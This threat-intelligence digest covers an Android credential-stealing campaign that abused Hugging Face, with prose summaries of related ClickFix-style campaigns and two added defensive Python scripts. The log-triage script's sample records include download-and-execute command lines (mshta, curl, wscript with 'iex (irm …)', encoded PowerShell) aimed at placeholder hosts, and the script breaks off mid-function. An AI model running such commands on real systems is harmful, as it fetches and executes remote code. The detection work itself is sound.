Android Malware Campaign Abuses Hugging Face Platform
Summary
A new Android malware campaign leverages the Hugging Face platform to distribute thousands of variants of an APK payload designed to steal credentials from popular financial and payment services. The attack begins with a dropper app called TrustBastion, which uses scareware-style ads to lure victims into installing it. The dropper then redirects to a Hugging Face repository to download the final payload, using server-side polymorphism to evade detection. The malware abuses Android's Accessibility Services to capture screenshots, monitor user activity, and steal credentials. The campaign was discovered by Bitdefender researchers, who found over 6,000 commits in the repository. The repository was taken down but resurfaced under a new name, 'Premium Club', with the same malicious code. Bitdefender has published indicators of compromise and informed Hugging Face, which removed the malicious datasets.
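The capability set described above (an accessibility service, overlay display, screen recording/casting, and the ability to install further APKs) is visible statically in an app's manifest before the app ever runs. The following is an added example of a manifest triage check, not code from Bitdefender, Hugging Face or the campaign's reporting; the two manifest samples are constructed, and the permission and action names used are real Android identifiers that the page itself does not list.

```python
"""Static triage of an AndroidManifest.xml for the capability combination the
campaign above relies on: an accessibility service together with overlay and
screen-capture permissions, plus the ability to sideload further APKs
(dropper behaviour). Added example, not Bitdefender's or Hugging Face's code.
The manifest samples are constructed; the permission and action names are
real Android identifiers, not values taken from the page."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

OVERLAY_PERM = "android.permission.SYSTEM_ALERT_WINDOW"
INSTALL_PERM = "android.permission.REQUEST_INSTALL_PACKAGES"
PROJECTION_PERM = "android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION"
A11Y_BIND_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
A11Y_ACTION = "android.accessibilityservice.AccessibilityService"

# Constructed sample modelled on the 'Phone Security' style app described above.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.phonesecurity">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application>
    <service android:name=".SecurityService" android:exported="true"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <service android:name=".CastService" android:foregroundServiceType="mediaProjection"/>
  </application>
</manifest>"""

# Constructed sample: an ordinary app that only needs network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application/>
</manifest>"""


def declared_permissions(root):
    """Set of permission names declared with <uses-permission>."""
    return {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}


def accessibility_services(root):
    """Names of services the system would bind as accessibility services:
    they must carry the BIND permission and filter on the a11y action."""
    names = []
    for svc in root.iter("service"):
        if svc.get(ANDROID_NS + "permission") != A11Y_BIND_PERM:
            continue
        actions = {a.get(ANDROID_NS + "name") for a in svc.iter("action")}
        if A11Y_ACTION in actions:
            names.append(svc.get(ANDROID_NS + "name"))
    return names


def media_projection_services(root):
    """Services declared with the mediaProjection foreground type (screen capture)."""
    return [svc.get(ANDROID_NS + "name") for svc in root.iter("service")
            if "mediaProjection" in (svc.get(ANDROID_NS + "foregroundServiceType") or "")]


def triage_manifest(xml_text):
    """Return the package name, the findings, and a coarse verdict."""
    root = ET.fromstring(xml_text)
    perms = declared_permissions(root)
    findings = []
    a11y = accessibility_services(root)
    if a11y:
        findings.append("accessibility_service:" + ",".join(a11y))
    if OVERLAY_PERM in perms:
        findings.append("overlay_permission")
    if PROJECTION_PERM in perms or media_projection_services(root):
        findings.append("screen_capture")
    if INSTALL_PERM in perms:
        findings.append("sideload_installer")
    # Accessibility + overlay + screen capture is the credential-theft pattern;
    # an accessibility service or an APK installer on its own still deserves review.
    if a11y and "overlay_permission" in findings and "screen_capture" in findings:
        verdict = "high"
    elif a11y or "sideload_installer" in findings:
        verdict = "medium"
    else:
        verdict = "low"
    return {"package": root.get("package"), "verdict": verdict, "findings": findings}


if __name__ == "__main__":
    for sample in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        print(triage_manifest(sample))
```

The check is deliberately conservative: many legitimate apps declare one of these capabilities, so only the combination of an accessibility service with overlay and screen-capture rights is rated high. A manifest extracted from an APK with `aapt dump xmltree` or a decompiler can be fed to `triage_manifest()` directly.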
Timeline
- 30.01.2026 00:08 (2 articles)
Hugging Face Abused to Distribute Android Malware
The infection chain begins when users download the malicious Android app TrustBastion, which appears as scareware via popups claiming the device is infected with malware. The dropper app prompts users to run an update that mimics legitimate Google Play and Android system update dialog boxes. The dropper contacts an encrypted endpoint hosted at trustbastion[.]com, which returns an HTML file containing a redirect link to the Hugging Face repository hosting the malware. The malware masquerades as a 'Phone Security' feature to guide users through enabling Accessibility Services. The malware requests permissions for screen recording, screen casting, and overlay display to monitor all user activity and capture screen content. The malware captures lockscreen information for security verification of financial and payment services.
Sources:
- Hugging Face abused to spread thousands of Android malware variants — www.bleepingcomputer.com — 30.01.2026 00:08
- Android RAT Uses Hugging Face to Host Malware — www.infosecurity-magazine.com — 02.02.2026 12:30
Information Snippets
- Hugging Face is a popular platform for AI, NLP, and ML models, datasets, and applications.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- The TrustBastion dropper app uses scareware-style ads to lure victims into installing it.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- The dropper app contacts a server linked to trustbastion[.]com, which redirects to a Hugging Face dataset repository hosting the malicious APK.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- The threat actor uses server-side polymorphism to generate new payload variants every 15 minutes.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- The malware exploits Android's Accessibility Services to capture screenshots, monitor user activity, and steal credentials.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- The malware displays fake login interfaces impersonating financial services such as Alipay and WeChat to steal credentials.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- The malware remains connected to a command-and-control (C2) server, which receives stolen data and sends command execution instructions.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- Bitdefender researchers found over 6,000 commits in the repository, which was taken down but resurfaced under a new name, 'Premium Club'.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- Bitdefender has published indicators of compromise and informed Hugging Face, which removed the malicious datasets.
  First reported: 30.01.2026 00:08 (2 sources, 2 articles: www.bleepingcomputer.com, 30.01.2026 00:08; www.infosecurity-magazine.com, 02.02.2026 12:30)
- The infection chain begins when users download the malicious Android app TrustBastion, which appears as scareware via popups claiming the device is infected with malware.
  First reported: 02.02.2026 12:30 (1 source, 1 article: www.infosecurity-magazine.com, 02.02.2026 12:30)
- The dropper app prompts users to run an update that mimics legitimate Google Play and Android system update dialog boxes.
  First reported: 02.02.2026 12:30 (1 source, 1 article: www.infosecurity-magazine.com, 02.02.2026 12:30)
- The dropper contacts an encrypted endpoint hosted at trustbastion[.]com, which returns an HTML file containing a redirect link to the Hugging Face repository hosting the malware.
  First reported: 02.02.2026 12:30 (1 source, 1 article: www.infosecurity-magazine.com, 02.02.2026 12:30)
- The malware masquerades as a 'Phone Security' feature to guide users through enabling Accessibility Services.
  First reported: 02.02.2026 12:30 (1 source, 1 article: www.infosecurity-magazine.com, 02.02.2026 12:30)
- The malware requests permissions for screen recording, screen casting, and overlay display to monitor all user activity and capture screen content.
  First reported: 02.02.2026 12:30 (1 source, 1 article: www.infosecurity-magazine.com, 02.02.2026 12:30)
- The malware captures lockscreen information for security verification of financial and payment services.
  First reported: 02.02.2026 12:30 (1 source, 1 article: www.infosecurity-magazine.com, 02.02.2026 12:30)
Similar Happenings
Lazarus Group Expands BeaverTail Malware Capabilities
A new variant of the BeaverTail malware has been linked to the Lazarus Group, targeting cryptocurrency traders, developers, and retail employees. The malware, which functions as both an information stealer and a loader, has evolved to include advanced obfuscation techniques and diverse delivery methods. It has been observed using layered Base64 and XOR encoding to conceal its behavior and has been distributed through trojanized npm packages, fake job interview platforms, and ClickFix lures. The malware's capabilities now include keylogging, screenshot capture, and clipboard monitoring, aimed at stealing cryptocurrency wallet data and credentials. Additionally, BeaverTail has been merged with another DPRK-linked strain known as OtterCookie, enhancing its browser profile enumeration and remote access capabilities.
Malicious npm Packages Redirecting Users to Crypto Sites
A malware campaign involving seven npm packages has been identified, operated by the threat actor dino_reborn. The packages use cloaking tools, anti-analysis controls, and fake crypto-exchange CAPTCHAs to redirect victims to malicious URLs. The packages were taken down following security requests. The campaign employed detailed device fingerprinting and dynamic redirects through the Adspect API. The malware disabled user interactions and detected security researcher tools, displaying a white page to researchers while redirecting victims to malicious sites. The packages involved are signals-embed, dsidospsodlks, applicationooks21, application-phskck, integrator-filescrypt2025, integrator-2829, and integrator-2830.
GPUGate Malware Campaign Targets IT Firms in Western Europe
A sophisticated malware campaign, codenamed GPUGate, targets IT and software development companies in Western Europe, with recent expansions to macOS users. The campaign leverages Google Ads, SEO poisoning, and fake GitHub commits to deliver malware, including the Atomic macOS Stealer (AMOS) and Odyssey. The attack began in December 2024 and uses a 128 MB Microsoft Software Installer (MSI) to evade detection. The malware employs GPU-gated decryption and various techniques to avoid analysis and detection. The end goal is information theft and delivery of secondary payloads. The threat actors have native Russian language proficiency and use a cross-platform approach. The campaign has expanded to target macOS users through fake Homebrew, LogMeIn, and TradingView platforms. These platforms impersonate popular tools and use SEO poisoning to distribute the Atomic Stealer malware and Odyssey. The threat actors use multiple GitHub usernames to evade takedowns and deploy malware via Terminal commands. Similar tactics have been observed in previous campaigns using malicious Google Ads and public GitHub repositories. The AMOS malware now includes a backdoor component for persistent, stealthy access to compromised systems. The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025.

A new AMOS infostealer campaign abuses Google search ads to lure users into Grok and ChatGPT conversations that lead to installing the AMOS malware on macOS. The campaign was first spotted by researchers at Kaspersky, with a more detailed report by Huntress. The ClickFix attack begins with victims searching for macOS-related terms, leading to malicious instructions in AI chats. The malicious instructions are hosted on legitimate LLM platforms and contain commands to install the malware. The base64-encoded URL decodes into a bash script that loads a fake password prompt dialog. The script validates, stores, and uses the provided password to execute privileged commands, including downloading and executing the AMOS infostealer. AMOS was first documented in April 2023 and is a malware-as-a-service (MaaS) operation targeting macOS systems exclusively. AMOS added a backdoor module earlier this year, allowing operators to execute commands, log keystrokes, and drop additional payloads. AMOS is dropped as a hidden file and scans for cryptocurrency wallets, browser data, macOS Keychain data, and files on the filesystem. Persistence is achieved via a LaunchDaemon running a hidden AppleScript that restarts the malware if terminated. Users are advised to be vigilant and avoid executing commands they found online, especially if they don't fully understand what they do. Kaspersky noted that asking ChatGPT if the provided instructions are safe reveals they are not.
Shamos Infostealer Targeting Mac Devices via ClickFix Attacks
A new infostealer malware named Shamos is targeting Mac devices through ClickFix attacks. The malware, developed by the COOKIE SPIDER group, steals data and credentials from web browsers, Keychain, Apple Notes, and cryptocurrency wallets. The attacks use malvertising and fake GitHub repositories to lure victims into executing shell commands that download and install the malware. Since June 2025, Shamos has attempted infections in over three hundred environments monitored by CrowdStrike. The malware uses anti-VM commands, AppleScript for reconnaissance, and creates persistence through a Plist file. Users are advised to avoid executing unknown commands and to seek help from trusted sources.

A new variant of the MacSync stealer, related to Shamos, is distributed through a digitally signed, notarized Swift application, bypassing macOS Gatekeeper checks. This variant uses evasion techniques such as inflating the DMG file with decoy PDFs and performing internet connectivity checks. The malware runs largely in memory and cleans up temporary files after execution, leaving minimal traces behind. The associated developer certificate has been revoked. The latest variant of MacSync stealer is delivered through a digitally signed, notarized Swift application masquerading as a messaging app installer. The disk image file named 'zk-call-messenger-installer-3.9.2-lts.dmg' is hosted on 'zkcall[.]net/download'. The installer displays instructions prompting users to right-click and open the app to sidestep Gatekeeper safeguards. The Swift-based dropper performs a series of checks before downloading and executing an encoded script through a helper component. The curl command used to retrieve the payload shows clear deviations from earlier variants, using flags like -fL and -sS, and additional options like --noproxy. The DMG file is unusually large at 25.5 MB, inflated with unrelated PDF documents. The Base64-encoded payload corresponds to MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync comes fitted with a fully-featured Go-based agent that enables remote command and control capabilities.
UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages
The ClickFix malware campaign has evolved to include multi-OS support and video tutorials that guide victims through the self-infection process. The campaign, which uses fake Cloudflare CAPTCHA pages and malicious PowerShell scripts, has been observed deploying various payloads, including information stealers and backdoors. The FileFix attack, a variant of the ClickFix family, impersonates Meta account suspension warnings to trick users into installing the StealC infostealer malware. The campaign has evolved over two weeks with different payloads, domains, and lures, indicating an attacker testing and adapting their infrastructure. The FileFix technique, created by red team researcher mr.d0x, uses the address bar in File Explorer to execute malicious commands. The campaign employs steganography to hide a second-stage PowerShell script and encrypted executables inside a JPG image, which is believed to be AI-generated. The StealC malware targets credentials from various applications, cryptocurrency wallets, and cloud services, and can take screenshots of the active desktop. The FileFix attack uses a multilingual phishing site to trick users into executing a malicious command via the File Explorer address bar. The attack leverages Bitbucket to host the malicious components, abusing a legitimate source code hosting platform to bypass detection. The attack involves a multi-stage PowerShell script that downloads an image, decodes it into the next-stage payload, and runs a Go-based loader to launch StealC. The attack uses advanced obfuscation techniques, including junk code and fragmentation, to hinder analysis efforts. The FileFix attack is more likely to be detected by security products because the payload is executed by the victim's web browser. The FileFix attack demonstrates significant investment in tradecraft, with carefully engineered phishing infrastructure, payload delivery, and supporting elements to maximize evasion and impact. The FileFix attack is more sophisticated than ClickFix, as it abuses a widely used browser feature instead of the Run dialog or Terminal app.

The FileFix attack has been observed in a campaign that uses a combination of fake support portals, Cloudflare CAPTCHA error pages, and clipboard hijacking to socially engineer victims into running malicious PowerShell code. The FileFix attack has been observed using an AutoHotkey (AHK) script to profile the compromised host and deliver additional payloads, including AnyDesk, TeamViewer, information stealers, and clipper malware. The FileFix attack has been observed using an MSHTA command pointing to a lookalike Google domain to retrieve and execute a remote malicious script.

The MetaStealer attack, a variant of the ClickFix family, uses a fake Cloudflare Turnstile lure and an MSI package disguised as a PDF to deploy the MetaStealer infostealer malware. The attack involves a multi-stage infection chain that includes a DLL sideloading technique using a legitimate SentinelOne executable. The MetaStealer attack targets crypto wallets and other sensitive information, using a combination of social engineering and technical evasion techniques to deploy malware.

Recently, threat actors have been abusing the decades-old Finger protocol to retrieve and execute remote commands on Windows devices. The Finger protocol is used to deliver commands that create a random-named path, download a zip archive disguised as a PDF, and extract a Python malware package. The Python program is executed using pythonw.exe __init__.py, and a callback is made to the attacker's server to confirm execution. A related batch file indicates that the Python package is an infostealer. Another campaign uses the Finger protocol to retrieve and run commands that look for malware research tools and exit if found. If no malware analysis tools are found, the commands download a zip archive disguised as PDF files and extract the NetSupport Manager RAT package. The commands configure a scheduled task to launch the remote access malware when the user logs in. The Finger protocol abuse appears to be carried out by a single threat actor conducting ClickFix attacks.

A new EVALUSION ClickFix campaign has been discovered, delivering Amatera Stealer and NetSupport RAT. Amatera Stealer, an evolution of ACR Stealer, is available under a malware-as-a-service (MaaS) model and targets crypto-wallets, browsers, messaging applications, FTP clients, and email services. It employs advanced evasion techniques such as WoW64 SysCalls and is packed using PureCrypter. The stealer is injected into the MSBuild.exe process to harvest sensitive data and contact an external server to execute a PowerShell command to fetch and run NetSupport RAT. The campaign also involves phishing attacks using various malware families and phishing kits named Cephas and Tycoon 2FA. Tycoon 2FA is a phishing kit that bypasses multi-factor authentication (MFA) and authentication apps by intercepting usernames, passwords, session cookies, and MFA flows in real time. It has been used in over 64,000 attacks this year, primarily targeting Microsoft 365 and Gmail. Tycoon 2FA includes anti-detection layers and can lead to total session takeover, allowing attackers to move laterally into various enterprise systems. Legacy MFA methods are vulnerable to Tycoon 2FA, and phishing-proof MFA solutions like Token Ring and Token BioStick are recommended to prevent such attacks.

A new operation embedding StealC V2 inside Blender project files has been observed targeting victims for at least six months. The attackers placed manipulated .blend files on platforms such as CGTrader, where users downloaded them as routine 3D assets. When opened with Blender's Auto Run feature enabled, the files executed concealed Python scripts that launched a multistage infection. The infection chain began with a tampered Rig_Ui.py script embedded inside the .blend file. This script fetched a loader from a remote workers.dev domain, which then downloaded a PowerShell stage and two ZIP archives containing Python-based stealers. Once extracted into the Windows temp directory, the malware created LNK files to secure persistence, then used Pyramid C2 channels to retrieve encrypted payloads. StealC V2, promoted on underground forums since April 2025, has rapidly expanded its feature set. It now targets more than 23 browsers, over 100 plugins, more than 15 desktop wallets, and a range of messaging, VPN and mail clients. Its pricing, from $200 per month to $800 for 6 months, has made it accessible to low-tier cybercriminals seeking ready-to-use tools.

ClickFix attack variants have been observed using a realistic-looking Windows Update animation in a full-screen browser page to trick users into executing malicious commands. The new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers. The attack uses steganography to encode the final malware payload inside an image. The process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state. The shellcode holding the infostealer samples is packed using the Donut tool. The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13. A new campaign codenamed JackFix leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising. The JackFix campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code. The attack heavily leans on obfuscation to conceal ClickFix-related code and blocks users from escaping the full-screen alert by disabling the Escape and F11 keys, along with F5 and F12. The initial command executed is an MSHTA payload that's launched using the legitimate mshta.exe binary, which contains JavaScript designed to run a PowerShell command to retrieve another PowerShell script from a remote server. The PowerShell script attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged. The PowerShell script serves up to eight different payloads, including Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, and other unspecified loaders and RATs. The threat actor often changes the URI used to host the first mshta.exe stage and has been observed moving from hosting the second stage on the domain securitysettings.live to xoiiasdpsdoasdpojas.com, although both point to the same IP address 141.98.80.175.

An initial access broker tracked as Storm-0249 is abusing endpoint detection and response solutions and trusted Microsoft Windows utilities to load malware and establish communication and persistence in preparation for ransomware attacks. The threat actor has moved beyond mass phishing and adopted stealthier, more advanced methods that prove effective and difficult for defenders to counter. In one attack analyzed by researchers at cybersecurity company ReliaQuest, Storm-0249 leveraged the SentinelOne EDR components to hide malicious activity. The attack started with ClickFix social engineering that tricked users into pasting and executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. A malicious PowerShell script is also fetched from a spoofed Microsoft domain and piped straight into memory, never touching the disk and thus evading antivirus detection. The MSI file drops a malicious DLL (SentinelAgentCore.dll), which is placed strategically alongside the pre-existing, legitimate SentinelAgentWorker.exe, which is already installed as part of the victim's SentinelOne EDR. Next, the attacker loads the DLL using the signed SentinelAgentWorker (DLL sideloading), executing the file within the trusted, privileged EDR process and obtaining stealthy persistence that survives operating system updates. Once the attacker gains access, they use the SentinelOne component to collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, and to funnel encrypted HTTPS command-and-control (C2) traffic. The compromised systems are profiled using 'MachineGuid', a unique hardware-based identifier that ransomware groups like LockBit and ALPHV use for binding encryption keys to specific victims. The abuse of trusted, signed EDR processes bypasses nearly all traditional monitoring. The researchers recommend that system administrators rely on behavior-based detection that identifies trusted processes loading unsigned DLLs from non-standard paths. Furthermore, it is helpful to set stricter controls for curl, PowerShell, and LoLBin execution.

A new variation of the ClickFix attack dubbed 'ConsentFix' abuses the Azure CLI OAuth app to hijack Microsoft accounts without the need for a password or to bypass multi-factor authentication (MFA) verifications. ConsentFix tricks victims into completing the Azure CLI OAuth flow and steals the resulting authorization code, which is exchanged for full account access. The attack starts with victims landing on a compromised, legitimate website that ranks high on Google Search results. Victims are shown a fake Cloudflare Turnstile CAPTCHA widget that asks for a valid business email address, filtering out bots and non-targets. Victims are instructed to click a 'Sign in' button that opens a legitimate Microsoft URL in a new tab, leading to an Azure login page. The attack completes when victims paste the URL containing the Azure CLI OAuth authorization code into the malicious page, granting attackers access to the Microsoft account via Azure CLI. The attack triggers only once per victim IP address, preventing repeated phishing attempts on the same IP. Defenders are advised to monitor for unusual Azure CLI login activity, such as logins from new IP addresses, and to check for legacy Graph scopes used by attackers to evade detection.

Over the past six months, hackers have increasingly relied on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials. The BitB phishing technique was developed by security researcher mr.d0x in 2022. In a BitB attack, users who visit attacker-controlled webpages are presented with a fake browser pop-up containing a login form. The pop-up is implemented using an iframe that imitates the authentication interface of legitimate platforms and can be customized with a window title and URL that make the deception more difficult to detect. Recent phishing campaigns targeting Facebook users impersonate law firms claiming copyright infringement, threatening imminent account suspension, or Meta security notifications about unauthorized logins. To avoid detection and to increase the sense of legitimacy, cybercriminals added shortened URLs and fake Meta CAPTCHA pages. In the final stage of the attack, victims are prompted to log in by entering their Facebook credentials in a fake pop-up window. Trellix discovered a high number of phishing pages hosted on legitimate cloud platforms like Netlify and Vercel, which mimic Meta's Privacy Center portal, redirecting users to pages disguised as appeal forms that collected personal information. These campaigns constitute a significant evolution compared to standard Facebook phishing campaigns that security researchers typically observe. The key shift lies in the abuse of trusted infrastructure, utilizing legitimate cloud hosting services like Netlify and Vercel, and URL shorteners to bypass traditional security filters and lend a false sense of security to phishing pages. Most critically, the emergence of the Browser-in-the-Browser (BitB) technique represents a major escalation. By creating a custom-built, fake login pop-up window within the victim's browser, this method capitalizes on user familiarity with authentication flows, making credential theft nearly impossible to detect visually.

A new campaign codenamed CrashFix uses a malicious Chrome extension to deliver ModeloRAT via ClickFix-style browser crash lures. The campaign, tracked as KongTuke, uses a malicious Chrome extension named 'NexShield – Advanced Web Guardian' to crash the browser and trick victims into executing commands. The extension masquerades as a legitimate ad blocker and claims to protect users against ads, trackers, malware, and intrusive content. The extension was downloaded at least 5,000 times and is a near-identical clone of uBlock Origin Lite. The extension displays a fake security warning claiming the browser had 'stopped abnormally' and prompts users to run a 'scan'. The scan presents a bogus security alert instructing victims to open the Windows Run dialog and execute a command copied to the clipboard. Executing the command causes the browser to freeze and crash by launching a denial-of-service (DoS) attack that creates new runtime port connections through an infinite loop. The extension transmits a unique ID to an attacker-controlled server, allowing operators to track victims. The extension uses a delayed execution mechanism, triggering malicious behavior 60 minutes after installation and then every 10 minutes. The extension incorporates anti-analysis techniques to disable right-click context menus and prevent the use of developer tools. The CrashFix command employs the legitimate Windows utility finger.exe to retrieve and execute the next-stage payload from the attacker's server. The payload is a PowerShell command that retrieves a secondary PowerShell script, which uses multiple layers of Base64 encoding and XOR operations to conceal the next-stage malware. The decrypted blob scans running processes for over 50 analysis tools and virtual machine indicators, ceasing execution if found. The script checks if the machine is domain-joined or standalone and sends an HTTP POST request to the server containing a list of installed antivirus products and a flag indicating the machine type. For domain-joined machines, the campaign deploys ModeloRAT, a fully-featured Python-based Windows RAT that uses RC4 encryption for C2 communications. ModeloRAT sets up persistence using the Registry and facilitates the execution of binaries, DLLs, Python scripts, and PowerShell commands. ModeloRAT is equipped to update or terminate itself upon receiving specific commands and implements varied beaconing logic to avoid detection. For standalone workstations, the campaign ends with the C2 server responding with a test payload message, indicating it may still be in the testing phase. KongTuke's CrashFix campaign demonstrates how threat actors evolve their social engineering tactics by impersonating trusted projects and exploiting user frustration. Huntress attributes the analyzed CrashFix attack to a threat actor named 'KongTuke', whose operations have been on the company's radar since early 2025. Based on the recent discovery, the researchers believe that KongTuke is evolving and becoming more interested in enterprise networks, which are more lucrative for cybercriminals. Falling for ClickFix attacks can be prevented by making sure that the effect of any external command executed on the system is well understood. Furthermore, installing browser extensions only from trusted publishers or sources should keep you safe from CrashFix attacks or other threats. Users who installed NexShield should perform a full system cleanup, as uninstalling the extension does not remove all payloads, such as ModeloRAT or other malicious scripts.

The new campaign abuses SyncAppvPublishingServer.vbs, a signed Visual Basic Script associated with App-V, to retrieve and execute an in-memory loader from an external server using wscript.exe. The campaign uses a fake CAPTCHA verification prompt to trick users into pasting and executing a malicious command on the Windows Run dialog. The obfuscated loader runs checks to ensure that it's not run within sandboxed environments. The loader fetches configuration data from a public Google Calendar (ICS) file, turning a trusted third-party service into a dead drop resolver. The campaign retrieves additional loader stages, including a PowerShell script that functions as an intermediate loader to execute the next stage directly in memory. The resulting script is decrypted, GZip decompressed in memory, and run using Invoke-Expression, ultimately culminating in the execution of a shellcode loader designed to launch Amatera Stealer. The campaign targets enterprise managed systems, as the virtualization solution is built only into Enterprise and Education editions of Windows 10 and Windows 11, along with modern Windows Server versions. The campaign is highly sophisticated and evasive, using in-memory PowerShell code execution and relying on blockchain and popular CDNs to avoid communicating with any infrastructure that's not a legitimate service. The campaign uses a multi-stage attack chain that includes a fake CAPTCHA verification prompt, abuse of SyncAppvPublishingServer.vbs, and retrieval of configuration data from a public Google Calendar file. The campaign is part of the broader fake CAPTCHA ecosystem, which uses trusted web infrastructure as the delivery surface, with Cloudflare-style challenges acting as a conduit for clipboard-driven execution of PowerShell commands, VB Scripts, MSI installers, and browser-native frameworks like Matrix Push C2.
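Several of the chains above share one host-side trait: a command pasted into the Run dialog or the File Explorer address bar spawns a living-off-the-land binary (mshta.exe, finger.exe, curl.exe, wscript.exe with SyncAppvPublishingServer.vbs, encoded PowerShell, pythonw.exe running __init__.py) under explorer.exe, and in the Storm-0249 case a trusted EDR worker process spawns reg.exe and findstr.exe. The following is an added example of process-creation log triage that encodes those patterns as rules; it is not any vendor's detection content. The log records are constructed JSON lines in a simplified Sysmon-like schema (ParentImage, Image, CommandLine), which is an assumption, and the hostnames are reserved example domains.

```python
"""Triage of process-creation logs for the ClickFix/FileFix-style chains
described above (Run-dialog LOLBins, finger.exe, mshta.exe, encoded PowerShell,
SyncAppvPublishingServer.vbs, pythonw __init__.py, EDR-hosted reg/findstr).
Added example, not any vendor's detection content. The records are constructed
JSON lines in a simplified Sysmon-like schema; the field names are an assumption."""
import json
import re
from pathlib import PureWindowsPath

# Binaries a Run-dialog ClickFix command typically launches; explorer.exe is the
# parent of anything started from the Run dialog or the File Explorer address bar.
RUN_DIALOG_LOLBINS = {"mshta.exe", "finger.exe", "curl.exe", "wscript.exe", "cscript.exe"}
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)

# Constructed sample log: lines 1-5, 7 and 8 model the behaviours described above,
# lines 6 and 9 are benign activity that must not alert.
SAMPLE_LOG = r"""{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://example.invalid/stage1"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\finger.exe", "CommandLine": "finger user@example.invalid"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl -o C:\\Users\\Public\\update.msi https://example.invalid/u.msi"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs n;iex (irm https://example.invalid/l)"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAC4ALgAuACkA"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -Command Get-ChildItem C:\\Temp"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Program Files\\Python311\\pythonw.exe", "CommandLine": "pythonw.exe __init__.py"}
{"ParentImage": "C:\\Program Files\\SentinelOne\\Sentinel Agent\\SentinelAgentWorker.exe", "Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg query HKLM\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "CommandLine": "chrome.exe --profile-directory=Default"}
"""


def base(path):
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def evaluate(rec):
    """Return the names of every rule a single process-creation record matches."""
    image, parent = base(rec["Image"]), base(rec["ParentImage"])
    cmd = rec.get("CommandLine", "")
    low = cmd.lower()
    hits = []
    if parent == "explorer.exe" and image in RUN_DIALOG_LOLBINS:
        hits.append("lolbin_from_explorer")
    if image == "finger.exe":  # almost never used legitimately on modern Windows
        hits.append("finger_protocol")
    if image == "mshta.exe" and "http" in low:
        hits.append("mshta_remote_script")
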